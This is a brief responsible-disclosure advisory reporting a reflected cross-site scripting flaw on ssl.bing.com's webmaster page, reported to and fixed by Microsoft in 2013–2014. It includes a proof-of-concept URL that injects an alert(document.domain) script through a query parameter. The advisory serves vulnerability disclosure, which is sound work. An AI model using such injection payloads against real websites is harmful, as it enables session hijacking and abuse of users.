Advisory: ssl.bing.com - Cross-site Scripting vulnerability Advisory ID: SSCHADV2013-012 Author: Stefan Schurtz Affected Software: Successfully tested on ssl.bing.com Vendor URL: http://www.microsoft.com Vendor Status: fixed ========================== Vulnerability Description ========================== The website 'ssl.bing.com' is prone to a Cross-site Scripting vulnerability ========================== PoC-Exploit ========================== https://ssl.bing.com/webmaster/home/mysites?orde=1&url=http%3A%2F%2Fstefanschurtz.de%2Ff5018%27-alert%28document.domain%29-%27207aac89df6 ========================== Disclosure Timeline ========================== 29-Dec-2013 - informed Microsoft Security Response Center 30-Dec-2013 - feedback from Microsoft Security Response Center 31-Dec-2013 - status update from Microsoft Security Response Center 03-Jan-2014 - status update from Microsoft Security Response Center 24-Jan-2014 - informed from MSRC about fix ========================== Credits ========================== Vulnerability found and advisory written by Stefan Schurtz. ========================== References ========================== http://www.microsoft.com http://www.darksecurity.de/advisories/2013/SSCHADV2013-012.txt